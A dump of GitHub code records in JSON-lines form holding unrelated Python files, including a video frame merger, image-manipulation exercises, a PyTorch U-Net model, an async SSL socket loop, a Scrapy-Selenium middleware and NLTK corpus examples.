merged\n\n assert len(buffer_queues) == 1 # TODO: add validator when creating pipe\n stale = kwargs['stale']\n stage_conf = kwargs['stage_conf']\n stage_context = kwargs['stage_context']\n refreshed = False\n\n metadata = buffer_queues.values()[0].queue[0].values()[0]['metadata']\n expecting = stage_context.get('expecting', 1) # expecting lineage\n #print \"expecting\"\n #print expecting\n next_lineage = stage_context.get('next_lineage', 1)\n config = preprocess_config(stage_conf, {'fps': metadata['fps']})\n framesperchunk = config.get('framesperchunk', metadata['fps'])\n\n lst = []\n while not buffer_queues.values()[0].empty():\n lst.append(buffer_queues.values()[0].get())\n ordered_events = sorted(lst, key=lambda e: int(e.values()[0]['metadata']['lineage']) * 100000000 + e.values()[0][\n 'number'])\n start = 0\n while True:\n\n i = start\n fcount = start\n disregard = False\n\n if start + framesperchunk > len(ordered_events):\n break\n\n while i < (start + framesperchunk):\n #pdb.set_trace()\n\n #there is not enough extra events to cover for the empty ones\n if fcount == len(ordered_events):\n disregard = True\n break\n\n if int(ordered_events[fcount].values()[0]['metadata']['lineage']) != expecting:\n disregard = True\n break\n\n if 'Empty' in ordered_events[fcount].values()[0]:\n expecting+=1\n #do not increment i since this is empty\n fcount +=1\n continue\n\n if ordered_events[fcount].values()[0]['EOF']:\n expecting += 1\n\n fcount+=1\n i+=1\n\n\n if not disregard: # enough frames, merge and go!\n merged = merge_events(ordered_events[start:fcount], str(next_lineage))\n deliver_queue.put(merged)\n logging.info(\"delivered: %s\", merged)\n start += (framesperchunk + (fcount - i))\n next_lineage += 1\n refreshed = True\n stage_context['expecting'] = expecting # only when delivered should we update stage's expecting lineage\n continue\n break\n\n #print kwargs\n\n if refreshed or not stale:\n for e in ordered_events[start:]:\n buffer_queues.values()[0].put(e) # put them back\n\n else:\n # that're the only frames left, deliver\n merged = merge_events(ordered_events[start:], str(next_lineage))\n\n #If leftover had only empty frames\n if merged == {}:\n return\n\n deliver_queue.put(merged)\n logging.info(\"delivered leftover: %s\", merged)\n\n stage_context['next_lineage'] = next_lineage\n","repo_name":"excamera/pipeline","sub_path":"sprocket/delivery_function/serialzed_frame_with_empty_delivery_func.py","file_name":"serialzed_frame_with_empty_delivery_func.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"31535788502","text":"import os\n\nfrom eclinical.scaffold.template.file_operate import FileOperate\nfrom eclinical.scaffold.template.service import Service\n# from scaffold.template.service import Service\n\n\nclass GenService:\n def __init__(self, folder):\n self.folder = folder\n\n def add_service(self, service_names: str, app: str):\n for service_name in service_names.split(\",\"):\n service = Service(service_name, app)\n # 输出到service.py\n if not os.path.exists(os.path.join(self.folder, \"services\")): os.mkdir(\n os.path.join(self.folder, \"services\"))\n fop = FileOperate(self.folder)\n if fop.file_exist(\"services\", service.file_name):\n if input(f\"{service.service_name} 已存在,是否覆盖(Y/N)\") == 'N':\n continue\n fop.rewrite_file(\"services\", service.file_name + \".py\", service.output_service_py()) \\\n or fop.new_file(\"services\", service.file_name + \".py\", service.output_service_py())\n # 输出到 __init__.py\n fop.append_file(\"services\", \"__init__.py\", service.output_init_py()) \\\n or fop.new_file(\"services\", \"__init__.py\", service.output_init_py())\n # 输出到 conftest.py\n fop.append_file(\"\", \"conftest.py\", service.output_conftest_body_py()) \\\n or fop.new_file(\"\", \"conftest.py\", service.output_conftest_body_py())\n\n","repo_name":"thcpc/eclinical","sub_path":"scaffold/files/gen_service.py","file_name":"gen_service.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28348456011","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\ntry:\n import xmltodict\nexcept (ImportError, SystemError):\n raise SystemExit(\"Required Python module not found.\")\n\nimport argparse\nimport json\nimport os\n\n\ndef read_xml(input_path):\n snippet = False\n with open(input_path, \"r\", encoding=\"UTF-8\") as input_file:\n try:\n snippet = xmltodict.parse(input_file.read())[\"snippet\"]\n except Exception as err:\n print(err)\n\n return snippet\n\n\ndef format_snippet(snippet_json):\n description = snippet_json.get(\"description\", \"\")\n return (snippet_json.get(\"scope\", False), {\n \"trigger\": \"%s%s\" % (snippet_json.get(\"tabTrigger\", \"\"),\n \"\\t\" + description if description else \"\"),\n \"contents\": snippet_json.get(\"content\", \"\")\n })\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"folder_path\", type=str)\n\n args = parser.parse_args()\n snippet_files = []\n snippets_json = {}\n\n if os.path.isdir(args.folder_path):\n snippet_files = [os.path.join(args.folder_path, fp) for fp in os.listdir(\n args.folder_path) if fp.endswith(\".sublime-snippet\")]\n else:\n raise SystemExit(\"Path is not a folder:\\n%s\" % args.folder_path)\n\n for s in snippet_files:\n scope, completion = format_snippet(read_xml(s))\n\n if scope and completion.get(\"trigger\") and completion.get(\"contents\"):\n if scope not in snippets_json:\n snippets_json[scope] = []\n\n snippets_json[scope].append(completion)\n\n print(json.dumps(snippets_json, indent=4, separators=(\",\", \": \")))\n\n raise SystemExit(0)\n","repo_name":"Odyseus/OdyseusSublimePlugins","sub_path":"st_scripts/snippets_to_completions.py","file_name":"snippets_to_completions.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17448858461","text":"import matplotlib.pyplot as plt\nfrom openpyxl import load_workbook\n\ntabela_clientes = load_workbook(filename='tabelas/clientes_redes.xlsx')\npagamentos = tabela_clientes['aba_pagamentos']\n\nadimplentes = 0\ninadimplentes = 0\nfor pagamento in pagamentos.iter_rows(min_row=1, max_row=10,min_col=1, max_col=5):\n\tatrasado = pagamento[3].value\n\tif(atrasado == 'SIM'):\n\t\tinadimplentes = inadimplentes + 1\n\telse:\n\t\tadimplentes = adimplentes + 1\n\nvaloresX = [1, 2]\n\nvaloresY = [adimplentes, inadimplentes]\n\nnomes_barras = ['adimplentes', 'inadimplentes']\n\nplt.bar(valoresX, valoresY, tick_label = nomes_barras,\n\t\twidth = 0.8, color = ['green', 'red'])\n\nplt.xlabel('situação')\nplt.ylabel('quantidade')\nplt.title('Gráfico inadimplência')\n\nplt.show()\n","repo_name":"josedihego/python_redes","sub_path":"A07_planilhas_graficos.py","file_name":"A07_planilhas_graficos.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37098762206","text":"# não veja o código, apenas execute :)\r\n# apenas,\r\n# execute. \r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# ,-,\r\n# /.(\r\n# \\ {\r\n# `-`\r\n#\r\n#\r\n#\r\n# apenas relaxe...\r\n# . * . . .\r\n# . _ . . . .\r\n# . . _ / | . . * _ . .\r\n# | \\_| | | | __\r\n# _ | | _ | |/ |\r\n# | \\ | ____ | | / | \\\r\n# | | \\ +/_\\/_\\+ | | / | \\\r\n# _/____\\--...\\___ \\_||_/ ___...|__\\-..|____\\____/__\r\n# . . |_|__|_| . .\r\n# . . . _/ /__\\ \\_ . .\r\n# . . . . .\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\nfrom time import sleep\r\n\r\nwhile True:\r\n description = input(\"você poderia descrever como você se sente em uma palavra?\\nex: triste, feliz, cansado.\\n- \")\r\n\r\n list_of_words = description.split()\r\n\r\n feelings_list = []\r\n encouragement_list = []\r\n counter = 0\r\n\r\n for each_word in list_of_words:\r\n\r\n if each_word == \"triste\":\r\n feelings_list.append(\"triste\")\r\n encouragement_list.append(\"que amanhã será um dia melhor.\")\r\n counter += 1\r\n if each_word == \"feliz\":\r\n feelings_list.append(\"feliz\")\r\n encouragement_list.append(\"de continuar sorrindo.\")\r\n counter += 1\r\n if each_word == \"cansado\":\r\n feelings_list.append(\"cansado\")\r\n encouragement_list.append(\"você é mais forte do que pensa.\")\r\n counter += 1\r\n\r\n if counter == 0:\r\n\r\n output = \"eu não entendi, pode usar uma palavra diferente?\"\r\n\r\n elif counter == 1:\r\n\r\n output = \"parece que você está se sentindo bastante \" + \\\r\n feelings_list[0] + \". no entanto, lembre-se \" + \\\r\n encouragement_list[0] + \" espero que você se sinta melhor :)\"\r\n\r\n else:\r\n\r\n feelings = \"\"\r\n for i in range(len(feelings_list)-1):\r\n feelings += feelings_list[i] + \", \"\r\n feelings += \"e \" + feelings_list[-1]\r\n\r\n encouragement = \"\"\r\n for j in range(len(encouragement_list)-1):\r\n encouragement += encouragement_list[i] + \", \"\r\n encouragement += \"e \" + encouragement_list[-1]\r\n\r\n output = \"parece que você está se sentindo bastante \" + feelings + \\\r\n \". por favor, lembre-se sempre \" + encouragement + \" espero que você se sinta melhor :)\"\r\n\r\n print()\r\n print()\r\n print()\r\n sleep(3)\r\n print(\"hmmmm\")\r\n sleep(1)\r\n print(\"...\")\r\n sleep(1.5)\r\n print(\"você se sente \" + feelings_list[0] + \"?\")\r\n sleep(2)\r\n print(output)\r\n sleep(10)\r\n print()\r\n print()\r\n print()","repo_name":"iamjunioru/para-incentivar-alguem","sub_path":"para-vc.py","file_name":"para-vc.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"37692399476","text":"from datetime import datetime\n\ndef date_time(text: str) -> str:\n text = datetime.strptime(text, \"%d.%m.%Y %H:%M\")\n minute = \"minute\" if text.minute == 1 else \"minutes\"\n hour = \"hour\" if text.hour == 1 else \"hours\"\n return text.strftime(f\"%#d %B %Y year %#H {hour} %#M {minute}\")\n\nprint(\"Example:\")\nprint(date_time(\"01.01.2000 00:00\"))\n\nassert date_time(\"01.01.2000 00:00\") == \"1 January 2000 year 0 hours 0 minutes\"\nassert date_time(\"09.05.1945 06:07\") == \"9 May 1945 year 6 hours 7 minutes\"\n\nprint(\"The mission is done! Click 'Check Solution' to earn rewards!\")\n","repo_name":"FF3ADF61DD5F28BBCDD7F41A2313A8AB/Python_test","sub_path":"timeconverter.py","file_name":"timeconverter.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9141395927","text":"import cv2 as cv\nimport numpy as np\nimport argparse\nfrom pathlib import Path\n\nx_global = -1\ny_global = -1\n\n###############################################\ndef mouse_callback(event, x, y, flags, param):\n global x_global, y_global\n if event == cv.EVENT_LBUTTONDOWN:\n x_global, y_global = x, y\n print(x_global)\n###############################################\ndef crop_around_clicked(image: np.ndarray) -> np.ndarray:\n\n # Create a window for displaying the image\n cv.namedWindow('part 1 of 9')\n\n # Set the mouse callback function\n cv.setMouseCallback('part 1 of 9', mouse_callback)\n\n # Display the image\n cv.imshow('part 1 of 9', image)\n\n while True:\n\n k = cv.waitKey(1)\n if k == ord('q'):\n break\n\n # Close all windows\n cv.destroyAllWindows()\n #crop using coordinates\n print(x_global, y_global)\n im = image[x_global - 50:x_global + 50, y_global - 50:y_global + 50]\n return im\n\n\ndef scale_by_half_using_numpy_slicing(image: np.ndarray) -> np.ndarray:\n im = image[::2, ::2]\n return im\n\ndef scale_by_half_using_cv_resize(image: np.ndarray) -> np.ndarray:\n height, width, _ = image.shape\n\n new_height = height // 2\n new_width = width // 2\n im = cv.resize(image, (new_width, new_height))\n return im\n\ndef horizontal_mirror_image(image: np.ndarray) -> np.ndarray:\n #flip rows\n im = image[::-1]\n return im\n\ndef rotate_counterclockwise_90(image: np.ndarray) -> np.ndarray:\n # Rotate the image 90 degrees counterclockwise using np.transpose\n #counterclockwise (flipping x and y axis and not the BGR one(2))\n im = np.transpose(image, (1, 0, 2))\n #flip over vertical axis if clockwise required\n # im = im[:, ::-1, :]\n return im\n\ndef swap_b_r(image: np.ndarray) -> np.ndarray:\n # Split the channels\n b, g, r = cv.split(image)\n\n # Swap the Blue and Red channels\n im = cv.merge((r, g, b))\n return im\n\ndef invert_hue_ab(image: np.ndarray) -> np.ndarray:\n # Convert the image to LAB color space\n lab_image = cv.cvtColor(image, cv.COLOR_BGR2LAB)\n\n # Split the LAB image into channels\n l, a, b = cv.split(lab_image)\n\n # Invert the \"a\" channel and the \"b\" channel\n inverted_a = 255 - a\n inverted_b = 255 - b\n\n # Merge the inverted channels back into the LAB image\n inverted_lab_image = cv.merge((l, inverted_a, inverted_b))\n\n # # Convert the inverted LAB image back to BGR color space\n inverted_bgr_image = cv.cvtColor(inverted_lab_image, cv.COLOR_LAB2BGR)\n\n return inverted_bgr_image\n\n\ndef main(args: argparse.Namespace) -> None:\n image = cv.imread(str(args.image))\n image1 = crop_around_clicked(image)\n cv.imwrite(\"clicked.jpg\", image1)\n\n image2 = scale_by_half_using_numpy_slicing(image)\n cv.imwrite(\"halfsize.jpg\", image2)\n\n image3 = scale_by_half_using_cv_resize(image)\n cv.imwrite(\"halfsize_cv.jpg\", image3)\n\n image4 = horizontal_mirror_image(image)\n cv.imwrite(\"flipped.jpg\", image4)\n\n image5 = rotate_counterclockwise_90(image)\n cv.imwrite(\"rotated.jpg\", image5)\n\n image6 = swap_b_r(image)\n cv.imwrite(\"swapped.jpg\", image6)\n\n image7 = invert_hue_ab(image)\n cv.imwrite(\"inverted_ab.jpg\", image7)\n\n# Code inside the if statement below will only be executed if the script is called\n# directly from the command line\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"image\", type=Path)\n args = parser.parse_args()\n\n if not args.image.exists():\n print(f\"File {args.image} not found\")\n exit(1)\n\n main(args)\n","repo_name":"deepikaKini/CSCI-631-Computer-Vision","sub_path":"02 - Image processing/Numpy Operations/image_manipulation.py","file_name":"image_manipulation.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21353285673","text":"import torch\nimport torch.nn as nn\nfrom help_func.help_torch import RgbToYcbcr\nfrom help_func.help_torch import YcbcrToRgb\n\n\ndef make_model(args, parent=False):\n return _UUUU(args)\n # pass\n\n\nclass RDB_Conv(nn.Module):\n def __init__(self, inChannels, growRate, kSize=3):\n super(RDB_Conv, self).__init__()\n Cin = inChannels\n G = growRate\n self.conv = nn.Sequential(*[\n nn.Conv2d(Cin, G, kSize, padding=(kSize - 1) // 2, stride=1),\n nn.ReLU()\n ])\n\n def forward(self, x):\n out = self.conv(x)\n return torch.cat((x, out), 1)\n\n\nclass RDB(nn.Module):\n def __init__(self, growRate0, growRate, nConvLayers, kSize=3):\n super(RDB, self).__init__()\n G0 = growRate0\n G = growRate\n C = nConvLayers\n\n convs = []\n for c in range(C):\n convs.append(RDB_Conv(G0 + c * G, G))\n self.convs = nn.Sequential(*convs)\n\n # Local Feature Fusion\n self.LFF = nn.Conv2d(G0 + C * G, G0, 1, padding=0, stride=1)\n\n def forward(self, x):\n return self.LFF(self.convs(x)) + x\n\nclass _Base_UNet(nn.Module):\n def __init__(self, in_channels=256, out_channels=256, base_channels=256):\n super(_Base_UNet, self).__init__()\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu1 = nn.PReLU()\n self.conv2 = nn.Conv2d(in_channels=base_channels + in_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu2 = nn.PReLU()\n\n\n self.conv3 = nn.Conv2d(in_channels=base_channels*2 + in_channels, out_channels=base_channels*2, kernel_size=3,\n padding=1, stride=2, bias=False)\n self.relu3 = nn.PReLU()\n self.conv4 = nn.Conv2d(in_channels=base_channels*2, out_channels=base_channels*2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu4 = nn.PReLU()\n\n self.conv5 = nn.Conv2d(in_channels=base_channels*4, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=2, bias=False)\n self.relu5 = nn.PReLU()\n self.conv6 = nn.Conv2d(in_channels=base_channels*4, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu6 = nn.PReLU()\n self.conv7 = nn.Conv2d(in_channels=base_channels*8, out_channels=base_channels*4, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu7 = nn.PReLU()\n\n self.conv_up1 = nn.ConvTranspose2d(base_channels * 4, base_channels * 2, kernel_size=4, stride=2, padding=1, bias=False)\n\n self.conv8 = nn.Conv2d(in_channels=base_channels * 2, out_channels=base_channels * 2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu8 = nn.PReLU()\n self.conv9 = nn.Conv2d(in_channels=base_channels * 4, out_channels=base_channels * 2, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu9 = nn.PReLU()\n\n self.conv_up2 = nn.ConvTranspose2d(base_channels * 2, base_channels, kernel_size=4, stride=2, padding=1, bias=False)\n\n self.conv10 = nn.Conv2d(in_channels=base_channels, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu10 = nn.PReLU()\n self.conv11 = nn.Conv2d(in_channels=base_channels*2, out_channels=base_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n self.relu11 = nn.PReLU()\n\n self.conv12 = nn.Conv2d(in_channels=base_channels, out_channels=out_channels, kernel_size=3,\n padding=1, stride=1, bias=False)\n\n def forward(self, x):\n out0 = self.relu1(self.conv1(x))\n out = torch.cat([x, out0], dim=1)\n out1 = self.relu2(self.conv2(out))\n out = torch.cat([out, out1], dim=1)\n\n out = self.relu3(self.conv3(out))\n out2 = self.relu4(self.conv4(out))\n out = torch.cat([out, out2], dim=1)\n\n out = self.relu5(self.conv5(out))\n out3 = self.relu6(self.conv6(out))\n out = torch.cat([out, out3], dim=1)\n out = self.conv_up1(self.relu7(self.conv7(out)))\n\n out = torch.add(out2, out)\n out2 = self.relu8(self.conv8(out))\n out = torch.cat([out2, out], dim=1)\n out = self.conv_up2(self.relu9(self.conv9(out)))\n\n out = torch.add(out1, out)\n out1 = self.relu10(self.conv10(out))\n out = torch.cat([out, out1], dim=1)\n return torch.add(out0, self.conv12(self.relu11(self.conv11(out))))\n\nclass _UUUU(nn.Module):\n def __init__(self, args):\n super(_UUUU, self).__init__()\n # self.isjpg = 3\n self.isjpg = args.jpeg_grid_add\n if self.isjpg:\n input_channel = self.isjpg\n else:\n input_channel = 3\n self.rgb_to_yuv = RgbToYcbcr()\n self.conv_input = nn.Conv2d(in_channels=input_channel, out_channels=256, kernel_size=3, stride=1, padding=1, bias=False)\n self.relu1 = nn.PReLU()\n self.conv_down = nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, stride=2, padding=1, bias=False)\n self.relu2 = nn.PReLU()\n\n self.Unet1 = _Base_UNet()\n self.Unet2 = _Base_UNet()\n self.Unet3 = _Base_UNet()\n self.Unet4 = _Base_UNet()\n self.Unet5 = _Base_UNet()\n self.Unet6 = _Base_UNet()\n\n self.conv_bottle = nn.Conv2d(in_channels=256*7, out_channels=256, kernel_size=1, stride=1, padding=0, bias=False)\n\n self.num_dense = 4\n self.RDBs = nn.ModuleList()\n for i in range(self.num_dense):\n self.RDBs.append(\n RDB(growRate0=256, growRate=64, nConvLayers=8)\n )\n\n\n self.conv_mid = nn.Sequential(*[\n nn.Conv2d(self.num_dense*256 + 256, 256, 1, padding=0, stride=1),\n nn.Conv2d(256,256, kernel_size=3, padding=1, stride=1)\n ])\n\n self.upsampling = nn.PixelShuffle(2)\n\n self.conv_output = nn.Conv2d(in_channels=64, out_channels=3, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.yuv_to_rgb = YcbcrToRgb()\n\n def forward(self, x):\n yuv_input = self.rgb_to_yuv(x[:,:3,...])\n residual = yuv_input\n if self.isjpg:\n _input = torch.cat([yuv_input, x[:,3:,...]], dim=1)\n else:\n _input = yuv_input\n out = self.relu1(self.conv_input(_input))\n out = self.relu2(self.conv_down(out))\n\n outs = [out]\n outs.append(self.Unet1(outs[-1]))\n outs.append(self.Unet2(outs[-1]))\n outs.append(self.Unet3(outs[-1]))\n outs.append(self.Unet4(outs[-1]))\n outs.append(self.Unet5(outs[-1]))\n outs.append(self.Unet6(outs[-1]))\n\n out = self.conv_bottle(torch.cat(outs, dim=1))\n\n RDBs_out = [out]\n for i in range(self.num_dense):\n out = self.RDBs[i](out)\n RDBs_out.append(out)\n\n\n out = self.conv_mid(torch.cat(RDBs_out, dim=1))\n out = self.upsampling(out)\n out = self.conv_output(out)\n out = torch.add(out, residual)\n\n out = self.yuv_to_rgb(out)\n return out\n\n\n\n\nif __name__ == '__main__':\n from my_torchsummary import summary\n\n m = _UUUU(1).cuda()\n\n # inpt = torch.randn((1,5,96,96)).cuda()\n # while True:\n # m(inpt)\n torch.set_grad_enabled(False)\n m.eval()\n summary(m, (3, 1280, 720))\n\n\n\n\n\n\n\n","repo_name":"tuzm24/Ntire2021","sub_path":"model/uuuu.py","file_name":"uuuu.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5303583597","text":"import selectors\nimport socket\nimport ssl\n\nclass Future:\n def __init__(self) -> None:\n self.result = None\n self._callback = None\n\n def set_done_callback(self, fn):\n self._callback = fn\n\n def set_result(self, result):\n self.result = result\n self._callback(self)\n\n\nclass Task:\n def __init__(self, coroutine) -> None:\n self.coroutine = coroutine\n self.step()\n self.done = False\n\n def step(self, future=None):\n try:\n if future is None:\n next_future = self.coroutine.send(None)\n else:\n next_future = self.coroutine.send(future.result)\n except StopIteration:\n self.done = True\n return\n\n next_future.set_done_callback(self.step)\n\nclass AsyncSocket:\n def __init__(self, hostname):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setblocking(False)\n self.future = Future()\n self.hostname = hostname\n\n def get_fd(self):\n return self.sock\n\n def on_read(self):\n self.future.set_result(None)\n\n def on_write(self):\n self.future.set_result(None)\n\n def get_future(self):\n return self.future\n\n def connect(self):\n try:\n self.sock.connect((self.hostname, 443))\n except BlockingIOError:\n pass\n\n yield self.future\n\n yield from self._do_handshake()\n\n def _do_handshake(self):\n # convert to ssl connection\n context = ssl.SSLContext(ssl.PROTOCOL_TLS)\n context.verify_mode = ssl.CERT_REQUIRED\n context.check_hostname = True\n context.load_default_certs()\n self.sock = context.wrap_socket(self.sock,\n server_hostname=self.hostname,\n do_handshake_on_connect=False)\n # Do handshake\n while True:\n try:\n self.sock.do_handshake()\n break\n except ssl.SSLWantReadError:\n pass\n except ssl.SSLWantWriteError:\n pass\n\n yield self.future\n\n def read(self):\n response = b''\n while True:\n try:\n yield self.future # 等待 Read 事件, 當有 READ 的事件時,就會被 Resume\n chunk = self.sock.recv(4096)\n if chunk:\n response += chunk\n else:\n return response\n except ssl.SSLWantReadError:\n # 忽略 ssl socket 的內容不足的錯誤\n pass\n\n def write(self, message):\n self.sock.write(message) \n\nclass Loop:\n def __init__(self):\n self.selector = selectors.DefaultSelector()\n self.tasks = []\n\n def create_socket(self, hostname):\n socket = AsyncSocket(hostname)\n self.selector.register(socket.get_fd(), selectors.EVENT_READ | selectors.EVENT_WRITE, socket)\n return socket\n\n def create_task(self, coroutine):\n task = Task(coroutine)\n self.tasks.append(task)\n return task\n\n def is_done(self):\n for task in self.tasks:\n if task.done is False:\n return False\n\n return True\n\n def run(self):\n while True:\n events = self.selector.select()\n for key, mask in events:\n socket = key.data\n if mask | selectors.EVENT_READ:\n socket.on_read()\n elif mask | selectors.EVENT_WRITE:\n socket.on_write()\n\n if self.is_done():\n break\n\n","repo_name":"Swind/concurrency_example","sub_path":"libs/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2182734559","text":"from src.clustering import Clustering\nfrom src.dataloader import DataLoader\nfrom src.dimension_reduction import DimRed\nfrom src.standardizer import Standardizer\n\n\ndef main():\n dl = DataLoader()\n standardizer = Standardizer(dl=dl, concept=\"final_death_rate\")\n standardizer.run()\n dimred = DimRed(stand=standardizer, dim_red=\"2D2PCA\")\n dimred.run()\n clustering = Clustering(dimred=dimred, img_prefix=\"2d2pca_fdr_man_\", threshold=15, dist=\"manhattan\")\n clustering.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vmarsi/COVID-19-Country-Clustering","sub_path":"src/main_run.py","file_name":"main_run.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32828546104","text":"import random\nimport selenium.webdriver.support.ui as ui\n\nfrom scrapy.http import HtmlResponse\nfrom scrapy import signals\nfrom selenium import webdriver\n\n#采用中间件结合selenium\nclass JavaScriptMiddleware(object):\n def process_request(self, request, spider):\n if spider.name == \"music\":\n driver = webdriver.Chrome('G:/Tools/selenium/chromedriver.exe') #指定使用的浏览器\n driver.get(request.url)\n driver.switch_to.frame('g_iframe') #移动到 iframe\n wait = ui.WebDriverWait(driver, 15)\n if wait.until(lambda driver: driver.find_element_by_id('toplist')):\n body = driver.page_source\n return HtmlResponse(driver.current_url, body=body, encoding='utf-8', request=request)\n else:\n return","repo_name":"jenifly/scrapy_t1","sub_path":"jenifly_scrapy/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37251368592","text":"# С помощта на оператора while или for, изчислете и изведете числата на Фибоначи.\n\nfibonacciCount = int(input())\n\nprevFibonacci = 0\ncurrentFibonacci = 1\ncount = 0\n\n# check if the number of terms is valid\nif fibonacciCount <= 0:\n print(\"Must be positive integer\")\nelif fibonacciCount == 1:\n print(\"Fibonacci sequence:\")\n print(prevFibonacci)\nelse:\n print(\"Fibonacci sequence:\")\n while count < fibonacciCount:\n print(prevFibonacci)\n calculated = prevFibonacci + currentFibonacci\n\n prevFibonacci = currentFibonacci\n currentFibonacci = calculated\n count += 1\n","repo_name":"valentin-mladenov/Tu-Varna","sub_path":"Machine.Learning/lab_1/z1_fibonachi.py","file_name":"z1_fibonachi.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30386997101","text":"# -*- coding: utf-8 -*-\n\nimport nltk\nfrom pprint import pprint\n# 古腾堡语料库\nfrom nltk.corpus import gutenberg\n# 网络语料库\nfrom nltk.corpus import webtext\n# 读取文本内容\nfrom nltk.corpus import PlaintextCorpusReader\n# 就职演说语料库\nfrom nltk.corpus import inaugural\n# 即时消息聊天会话语料库\nfrom nltk.corpus import nps_chat\n# 布朗语料库,包含500个不同来源\nfrom nltk.corpus import brown\n# 路透社语料库\nfrom nltk.corpus import reuters\n\n\ndef corpus():\n # 获取语料库中的所有文本文件\n l = gutenberg.fileids()\n print(l)\n\n # 获取文本的所有单词列表\n w = gutenberg.words(\"austen-emma.txt\")\n print(w)\n\n # 获取语料\n names_corpus = PlaintextCorpusReader('../testdata', ['female.txt', 'male.txt'])\n all_names = names_corpus.words()\n print(all_names)\n\n # 返回文本原始字符串\n # raw_str = gutenberg.raw(\"austen-emma.txt\")\n # print(raw_str)\n\n # 返回文本的句子列表,每个句子是单词列表\n sentences = gutenberg.sents(\"austen-emma.txt\")\n print(sentences)\n\n # 获取网络文本语料库\n net_corpus = webtext.fileids()\n print(net_corpus, type(net_corpus))\n\n # 美总统就职演说语料\n sp = inaugural.fileids()\n print(sp[-10:])\n print(type(sp))\n print(sp[-6:-1])\n\n # 聊天会话语料\n tt = nps_chat.fileids()\n pprint(tt)\n\n # 返回对话列表,每个对话是单词列表; 05年10月19,30多岁,705个帖子\n chat_room = nps_chat.posts('10-19-30s_705posts.xml')\n print(chat_room[-3:])\n\n # 获取语料库里的所有类别\n cc = brown.categories()\n print(cc)\n c = brown.fileids(['news', 'lore'])\n print(c)\n print(brown.words('ca01'))\n\n # 路透社语料库的类别\n rr = reuters.categories()\n print(rr)\n print(len(rr))\n\n# 条件概率 类别为条件, 单词为事件\npairs = [(genre, word) for genre in brown.categories() for word in brown.words(categories=genre)]\nprint(pairs[:4])\ncfd = nltk.ConditionalFreqDist(pairs)\nprint(cfd.conditions())\n\ngenres = ['news', 'religion', 'hobbies', 'science_fiction', 'romance', 'humor']\nmodals = ['can', 'could', 'may', 'might', 'must', 'him']\n# 以表格形式显示\ncfd.tabulate(conditions=genres, samples=modals)\n# 图表\n# cfd.plot(conditions=genres, samples=modals)\n\ntext = brown.words(categories='news')\n# 双连词\nbigrams_words = nltk.bigrams(text)\n# print(list(bigrams_words)[:4])\ncfd = nltk.ConditionalFreqDist(bigrams_words)\n# print(cfd.conditions())\nfd = cfd['can']\n# 分析 can 后面的词\nfd.plot(10)","repo_name":"clnFind/NLPLearning","sub_path":"nltk/nltk_test.py","file_name":"nltk_test.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19604624281","text":"import csv # for importing csv files\nimport networkx as nx # for graphing and plotting)\nimport matplotlib.pyplot as plt\nimport time\n\n## Import random number stuff\nimport os\nclear = lambda: os.system('clear')\nimport struct\nimport random\n\n## Debugging\n# import pdb; pdb.set_trace()\n\n# Initialize random number generator\nsystemRandom = random.SystemRandom()\n\n# Define Static global variables\n\n## Location of metre CSV file.\n#METRE_CSV_FILE_LOCATION = 